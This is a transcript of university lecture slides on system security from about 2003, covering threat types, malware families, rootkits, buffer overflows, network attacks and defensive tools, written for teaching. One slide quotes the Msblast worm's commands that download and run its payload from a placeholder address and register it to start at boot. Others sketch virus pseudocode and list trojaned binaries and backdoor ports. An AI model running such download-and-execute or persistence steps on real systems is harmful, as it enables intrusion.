System Security - PowerPoint PPT Presentation

1 / 75
About This Presentation
Title:

System Security

Description:

The rootkit typically hides itself using the hacked Windows installation. ... Windows Rootkit Examples. null.sys. HE4Hook. Hacker Defender. Slanret. He4Hook. Vanquish ... – PowerPoint PPT presentation

Number of Views:150
Avg rating:3.0/5.0
Slides: 76
Provided by: engineeri3
Category:

less

Transcript and Presenter's Notes

Title: System Security


1
System Security
  • Prabhaker Mateti
  • Wright State University

2
  • A Few Assessments

3
Top 20 Vulnerabilities/ NIPCFBISANS(May 29,
2003)
  • W1 Internet Information Services (IIS)
  • W2 MDAC Remote Data Services
  • W3 Microsoft SQL Server
  • W4 NETBIOS -- Unprotected Networking Shares
  • W5 Anonymous Logon -- Null Sessions
  • W6 LAN Manager Authentication -- Weak LM Hashing
  • W7 No Passwords or Weak Passwords
  • W8 Internet Explorer
  • W9 Remote Registry Access
  • WA Windows Scripting Host

4
Top 20 Vulnerabilities/ NIPCFBISANS(May 29,
2003)
  • U1 RPC Remote Procedure Calls
  • U2 Apache Web Server
  • U3 Secure Shell (SSH)
  • U4 SNMP
  • U5 File Transfer Protocol (FTP)
  • U6 R-Services -- Trust Relationships
  • U7 Line Printer Daemon (LPD)
  • U8 Sendmail
  • U9 BIND/DNS
  • UA No Passwords or Weak Passwords

5
Threats To The National Infrastructures
(Defense Science Board)
  • Incomplete, inquisitive and unintentional
    blunders.
  • Hackers driven by technical challenges.
  • Disgruntled employees or customers seeking
    revenge.
  • Criminals interested in personal financial gain
    or stealing services.
  • Organized crime with the intent of hiding
    something or financial gain.
  • Organized terrorist groups attempting to
    influence U.S. policy by isolated attacks.
  • Foreign espionage agents seeking to exploit
    information for economic, political, or military
    purposes.
  • Tactical countermeasures intended to disrupt
    specific weapons or command structures.
  • Multifaceted tactical information warfare applied
    in a broad orchestrated manner to disrupt a major
    U.S. military mission.
  • Large organized groups or nation-states intent on
    overthrowing the United States.

6
Just the facts Madam
7
Security Incidents / CERT
  • 76,404 Jan June 2003
  • 82,094 all of 2002
  • CERT uses the word "incident" as an
    administrative term that groups together any
    related set of activities for example,
    activities in which the same tool or exploit is
    used by an intruder. A single "incident" can
    involve anything from a single host computer to a
    very large number of host computers, at a single
    site or at hundreds of thousands of sites.

8
Number of Hosts in the DNS(isc.org Internet
Domain Survey, Jan 2003)
Jan 2003 171,638,297 Jul 2002 162,128,493
Jan 2002 147,344,723 Jul 2001 125,888,197
Jan 2001 109,574,429 Jul 2000 93,047,785
Jan 2000 72,398,092
9
(No Transcript)
10
  • Terms

11
So you got r00ted.
  • Your machine has been compromised.
  • root administrator super-user
  • An unauthorized user has obtained root
    privileges.
  • A rootkit may have been installed.
  • Forensic analyses made with tools existing on
    that system are unreliable.

12
Denial of Service (DoS)
  • We think of computer systems as providing
    services to authorized users.
  • When a system is deliberately made to crash, or
    made to run legitimate users' programs so very
    slowly that it is unusable, we refer to it as a
    "denial of service attack."
  • The attacker accomplishes this by running certain
    cleverly composed programs, and is pre-aware of
    the consequences. 

13
Black Hats v. White Hats
  • Black hats are the "bad" guys in that they use
    their knowledge to unauthorizedly break into even
    more systems, and pass their knowledge to other
    insiders.
  • White hats are the "good" guys they are mostly
    into forensics and prevention of attacks. 

14
Vulnerability,
  • Vulnerability A weakness that can be exploited
    to cause damage.
  • Attack A method of exploiting a vulnerability.
  • Threat A motivated, capable adversary that
    mounts attacks.

15
Hacker v. Attacker v. Intruder
  • Hacker One who programs enthusiastically, even
    obsessively.
  • An expert at a particular program, as in a Unix
    hacker.
  • A hacker enjoys exploring the details of
    programmable systems and how to stretch their
    capabilities.
  • A hacker has ethics.

16
Viruses
  • Viruses are "programs" that modify other programs
    on a computer, inserting copies of themselves. 
  • Viruses are not officially programs
  • They cannot run on their own.
  • Need to have some host program.
  • When the host program is run, the virus runs.

17
Structure of Viruses
  • V()
  • infectExecutable()
  • if (triggered()) doDamage()
  • jump to main of infected program
  • void infectExecutable()
  • file chose an uninfected executable file
    prepend V to file
  • void doDamage() ...
  • int triggered() return (some test? 1 0)

18
Worms
  • Worms are programs that propagate from computer
    to computer on a network.
  • Worms  can run independently.
  • Worms may have (different) portions of themselves
    running on many different machines.
  • Worms do not change other programs, although they
    may carry other code that does.

19
Trojans
  • A Trojan mimics the functionality of its namesake
    legitimate program.
  • But has a hidden agenda.
  • Ex wu-ftpd Trojan - Login with specific
    user/password gives a root shell.

20
Backdoors
  • Also called trap doors.
  • Allow unauthorized access to a system.
  • The absence of backdoors cannot be established.

21
Malware
  • Viruses Worms Trojans
  • Any program that has a malicious intent

22
System Security
  • System Security
  • Computer Security Network Security Internet
    Security
  • Trojan Horses, Viruses and Worms
  • Privacy and Authentication
  • TCP/IP exploits
  • Firewalls
  • Secure Configuration of Personal Machines
  • Buffer Overflow and Other Bug Exploitation
  • Writing Bug-free and Secure Software
  • Secure e-Commerce Transactions

23
  • Current practices, and their problems

24
Improper Configuration
  • Out of the box installations are rarely properly
    configured.
  • Standard user accounts with standard passwords.
  • Running unneeded services.
  • Leaving sensitive files read/write-open.

25
Fortification
  • Start with a properly configured system.
  • Delete weak or unneeded components.
  • Add protective layers.
  • Keep detailed logs.

26
Hardened OS
  • Often equated with fortification.
  • Rebuilding an OS from the same source code but by
    using a more rigorous compiler.
  • Redesigning portions of an OS.
  • Statically v. dynamically configured.

27
Rootkits
  • A rootkit is a collection of tools and utilities
    that attackers use to hide their presence and
    gather data to help them infiltrate further
    across the network. Rootkits insert backdoors,
    install Trojans, and patch existing programs.
  • A rootkit may disable auditing when a certain
    user is logged on.
  • A rootkit could allow anyone to log in if a
    certain backdoor password is used.
  • A rootkit could patch the kernel itself, allowing
    anyone to run privileged code if they use a
    special filename
  • Installed after the attacker gains access.
  • Cannot be detected by firewalls or anti-virus
    scanners.
  • 203 results for search rootkit on
    www.packetstormsecurity.org

28
Rootkits
  • Rootkit was originally a Unix term, derived
    from the word root.
  • Unix rootkits typically replace system binaries
    with trojaned binaries.
  • The trojaned binaries hide the attacker
    activities

29
Windows Rootkit
  • A Windows rootkit typically replaces APIs, not
    binaries.
  • Any program that calls those replaced APIs is
    potentially affected.
  • The rootkit typically hides itself using the
    hacked Windows installation.
  • A typical Windows rootkit can hide files,
    folders, processes, services, and registry
    entries

30
Windows Rootkit Examples
  • null.sys
  • HE4Hook
  • Hacker Defender
  • Slanret
  • He4Hook
  • Vanquish
  • Fu

31
Null session
  • Unauthenticated connection
  • Empty username, empty password
  • Null sessions can always be established to
    NT4, Windows 2000, and Windows XP machines. If
    the machine's server service is enabled, and
    ports 139 or 445 are available, then you can do a
    net use with anonymous credentials, and the
    system will respond with "Command completed
    successfully". This has not changed from NT4 to
    Win2K to XP. -- FOCUS-MS_at_securityfocus.com

32
Linux Rootkit Examples
  • Linux Rootkit (LRK)
  • TeLeKit
  • Adore
  • Knark
  • t0rnkit
  • Kernel Intrusion System (KIS)

33
_ _ ____ _
_ _ _ ___ ___ ___ (_)_ __ _ ___
__ _ \ ___ ___ _ _(_) _ _ __ __
_ '_ \ \ \/ / _) / _ \ / _ \
__ / / __ ___ _
_______ _\__,_/_/\_\ _ \_\___/ \___/
\___\_\_\__ _________
  • chfn Trojaned! User-r00t
  • chsh Trojaned! User-r00t
  • inetd Trojaned! Remote access
  • login Trojaned! Remote access
  • ls Trojaned! Hide files
  • du Trojaned! Hide files
  • ifconfig Trojaned! Hide sniffing
  • netstat Trojaned! Hide connections
  • passwd Trojaned! User-r00t
  • ps Trojaned! Hide processes
  • top Trojaned! Hide processes
  • rshd Trojaned! Remote access
  • syslogd Trojaned! Hide logs
  • linsniffer Packet sniffer!
  • fix File fixer!
  • z2 Zap2 utmp/wtmp/lastlog eraser!
  • wted wtmp/utmp editor!
  • lled lastlog editor!
  • bindshell port/shell type daemon!

34
Msblast.exe(Aug 12, 2003)
  • The exploit code is derived from the well known
    dcom.c exploit.
  • Exploits the MS DCOM RPC vulnerability using TCP
    port 135.
  • Produces a remote command line shell.
  • Runs the following commands
  • tftp -i x.x.x.x GET msblast.exe
  • start msblast.exe
  • msblast.exe
  • Creates the following registry key to run at
    boot
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    \windows auto update 'msblast.exe'
  • The worm will begin to scan the local class B
    subnet, and will also generate a random address
    to begin scanning at, then will sequentially scan
    from that point forward incrementing by host
    address, class c, class b and class a. It can
    scan hosts at a rate of 20 per second.
  • The worm contains the following text, which does
    not get displayed
  • I just want to say LOVE YOU SAN!! billy gates
    why do you make this possible ? Stop making money
    and fix your software!!

35
Booting Up
  • BIOS
  • OS Kernel
  • Initialization
  • User logins

36
boot.ini
boot loader timeout30 defaultmulti(0)disk(0)rd
isk(0)partition(9)\WINDOWS operating
systems C\bootsect\hdc3grub.bin"Booting From
FAT32on120GB" multi(0)disk(0)rdisk(0)partition(3)
\WINDOWS"Windows XP Pro r0 p3"
/fastdetect multi(0)disk(0)rdisk(0)partition(9)\WI
NDOWS"Windows XP Pro r0 p9" /fastdetect multi(0)d
isk(0)rdisk(0)partition(14)\WINDOWS"Windows XP
Pro r0 p14" /fastdetect C\bootsect\hdc3grub.bin"
Linux via Grub"
37
/boot/grub/menu.lst
  • timeout 10
  • default 1
  • title failsafe
  • kernel (hd0,6)/boot/vmlinuz root/dev/hda7
    failsafe devfsnomount hdcide-scsi acpioff
  • initrd (hd0,6)/boot/initrd.img
  • title linux-smp
  • kernel (hd0,6)/boot/vmlinuz-smp root/dev/hda7
    devfsmount hdcide-scsi acpioff
  • initrd (hd0,6)/boot/initrd-smp.img
  • title windows
  • root (hd0,0)
  • chainloader 1

38
Human User Authentication
  • Something you know
  • (e.g., a password or other secret)
  • Something you have
  • (e.g., smart card, credit card)
  • Something you are
  • (e.g., fingerprints, retinal scan, voice print).

39
Passwords
  • Weak passwords social engineering.
  • telnet, ftp, passwords travel the network in
    the clear can be sniffed.
  • One Time Passwords

40
Cryptography
  • "Computationally Infeasible
  • N 2a 3b 5c 7d ...
  • One way hash function
  • takes a variable-length input sequence of bytes
    and converts it into a fixed-length sequence.
  • designed to be computationally infeasible to
    reverse the process

41
Symmetric Keys
  • sender and receiver of a message share a single,
    common key.
  • If ct encryption (pt, key), then pt
    decryption (ct, key).
  • DES
  • IDEA
  • Blowfish

42
Public and Private Keys
  • a public key known to everyone, and a private or
    secret key known only to the recipient of the
    message
  • The two keys are mathematically related, yet it
    is computationally infeasible to deduce one from
    the other.
  • A global registry of public keys is needed
  • RSA

43
Man-in-the-Middle Attack
  • The public key-based communication between say
    Alice and Bob is vulnerable.
  • Let us assume that Mallory, a cracker, not only
    can listen to the traffic between Alice and Bob,
    but also can modify, delete, and substitute
    Alice's and Bob's messages, as well as introduce
    new ones.  Mallory can impersonate Alice when
    talking to Bob and impersonate Bob when talking
    to Alice. Here is how the attack works.
  • Bob sends Alice his public key. Mallory
    intercepts the key and sends her own public key
    to Alice.
  • Alice generates a random session key, encrypts it
    with "Bobs" public key (which is really
    Mallory's), and sends it to Bob.
  • Mallory intercepts the message. He decrypts the
    session key with his private key, encrypts it
    with Bob's public key, and sends it to Bob.
  • Bob receives the message thinking it came from
    Alice. He decrypts it with his private key and
    obtains the session key.
  • Alice and Bob start exchanging messages using the
    session key. Mallory, who also has that key, can
    now decipher the entire conversation.

44
Buffer Overflow
  • Quick What's the computer vulnerability of
    the decade?  It's not the Y2K bug, according to
    computer science and security analysts, but a
    security weakness known as the buffer overflow .
  • Executable code is injected on to the runtime
    stack.
  • The return address that was on the stack is
    modified to point to the beginning of this code.
  • The executable code chosen produces a shell.
  • A root-privileged program is so exploited so,
    you are r00ted.

45
Buffer Overflow
  • Many of the Top 20 vulnerabilities are buffer
    overflow problems.
  • Caused by a simple class of programming errors.
  • C and its promiscuous style.

46
Network Security
47
Security of the Connection
  • Least secure Wireless networking
  • Second least secure Always-on wired connections
  • Second most secure Intermittent wired
    connections (dial-up)
  • Most secure Never connected.

48
TCP/IP Design Problems
  • Designed with too little concern for security.
  • All data, including various fields in the
    protocol headers, are sent in the clear.
  • Sender and Receiver in the packet can be spoofed.

49
IP4 Spoofing
  • IP address a.b.c.d, 4-bytes.
  • IP packet contains the IP addresses of sender and
    receiver.
  • Everything in the clear.
  • IP spoofing replaces the IP address of (usually)
    the sender or (in rare cases) the destination
    with a different address.
  • Services that authenticate based on the IP
    addresses are vulnerable. 
  • RPC,  NFS, r-commands (rlogin, rsh, rcp, etc.), X
    windows,

50
IP Fragment Attacks
  • When packets are too large to be sent in a single
    IP packet, due to interface hardware limitations
    for example, they can be split up by an
    intermediate router.
  • The final destination will reassemble all the
    fragments of an IP packet.
  • Attackers create artificially fragmented packets
    in order to circumvent firewalls that do not
    perform packet reassembly. 
  • In the IP layer implementations of nearly all OS,
    there are bugs in the reassembly code.
  • Attackers create fragments that trigger these
    bugs.

51
IPsec
  • Data Confidentiality IPSec sender can encrypt
    packets before transmitting them across a
    network.
  • Data Integrity IPSec receiver can authenticate
    packets sent by the IPSec sender to ensure that
    the data has not been altered during
    transmission.
  • Data Origin Authentication IPSec receiver can
    authenticate the source of the IPSec packets
    sent. This service is dependent upon the data
    integrity service.
  • Anti-Replay IPSec receiver can detect and reject
    replayed packets.
  • Two encryption modes Transport and Tunnel.

52
IP6
  • Expanded Addressing Capabilities
  • Header Format Simplification
  • Improved Support for Extensions and Options
  • Flow Labeling Capability
  • Authentication and Privacy Capabilities

53
TCP Exploits
  • The SYN Flood
  • Connection Killing by RST
  • Closing a Connection by FIN
  • Connection Hijacking

54
Covert Channels
55
Probing
56
Sniffers
  • A packet sniffer is a program that eavesdrops on
    the network traffic.
  • It copies packets as they pass the NIC.
  • An NIC in the normal mode reads packets destined
    to its specific MAC address, and all other
    packets are ignored.
  • An NIC in promiscuous mode, receives all packets
    regardless of the MAC address.

57
Packet Filters
58
Firewalls
  • Packet filters

59
Windows XP Built-in Firewall
60
Well known Trojan Portssample
  • 22 TCP Shaft
  • 23 TCP Fire Hacker
  • 41 TCP Deep Throat
  • 41 TCP Deep Throat
  • 456 TCP Hacker's Paradise
  • 901 TCP Backdoor.Devil
  • 999 TCP DeepThroat
  • 6712 TCP Sub Seven
  • 8879 TCP UDP BackOrifice 2000
  • 27444 UDP Trin00/TFN2K
  • 40412 TCP The Spy
  • 65535 TCP Adore Worm/Linux

61
Distributed Denial of Service (DDoS)
  • Several machines participate in a DoS attack of a
    victim.
  • These participants are often compromised innocent
    machines serving the attacks.
  • A remote client triggers the attack servers.

62
DNS Attacks
63
  • Protecting Our Systems

64
Security Software
  • Secure Shell, PGP,
  • Firewall Kits
  • Tools
  • Top 50 Security Tools survey from www.nmap.org
  • http//www.packetfactory.net
  • nmap, SAINT,
  • tcpdump, ethereal, snort,
  • Password cracking
  • Tcpwrapper

65
SSH (Secure Shell)
  • telnet, rlogin, do not authenticate the remote
    machine SSH does.
  • The password that the user types as part of the
    login ritual is sent as clear text by telnet and
    rlogin SSH sends it encrypted.
  • The data being sent and received by the RTF is
    also sent as clear text SSH sends and receives
    it in encrypted form.

66
SSH (Secure Shell)
  • ssh1 v. ssh2
  • SSH exploits do exist.
  • Susceptible to man in the middle attack
  • Encryption and decryption consumes computing and
    elapsed time.
  • Can be a nuisance. If the remote system has been
    legitimately reinstalled ...

67
SSH client and servers
  • ssh
  • putty
  • ttermpro
  • openssh

68
VPN (Virtual Private Network)
  • Data travels over public networks, usually the
    Internet.
  • The information needed to allow the data packets
    to be routed between the source node and the
    destination node is available to the public
    medium as in ordinary TCP/IP traffic,
  • But, all other information is encrypted.
  • PPTP, L2TP, IPsec

69
File Integrity
  • Is the file what I installed? Did it change?
  • Time stamps, file size, are not reliable.
  • MD5 checksums.
  • The MD5 algorithm takes as input an arbitrary
    length byte sequence and produces a 16-byte
    "fingerprint" or "message digest" of the input.
    It is conjectured that it is computationally
    infeasible to produce two messages having the
    same message digest, or to produce any message
    having a given pre-specified target message
    digest.

70
Scanning for Viruses
  • Scanners hook themselves in the read/write
    methods of the file sys.
  • Search for patterns in the file content.
  • Search for specific file names,
  • Can yield false positives.
  • Can miss identifying malware.

71
Intrusion Detection
72
Amazon.com book search results(2003/08/26)
73
Web Sites
  • There is an oceanic amount of material on
    network security available over the Internet.
    -- A Web Page.
  • How do we define a Security Web Site?
  • 1000 web sites

74
A Few Chosen Security Websites
  • www.incidents.org
  • www.cert.org
  • www.cerias.purdue.edu
  • www.securityfocus.com
  • lwn.net/security
  • www.microsoft.com/security
  • www.phrack.com

75
Links
  • CEG 429 Home Pagewww.cs.wright.edu/pmateti/Cours
    es/429 local-link
  • OSIS Lab Home Pagewww.cs.wright.edu/pmateti/OSIS
    local-link
  • Support Web Sitewww.cs.wright.edu/pmateti/Intern
    etSecurity/ local-link
Write a Comment
User Comments (0)
About PowerShow.com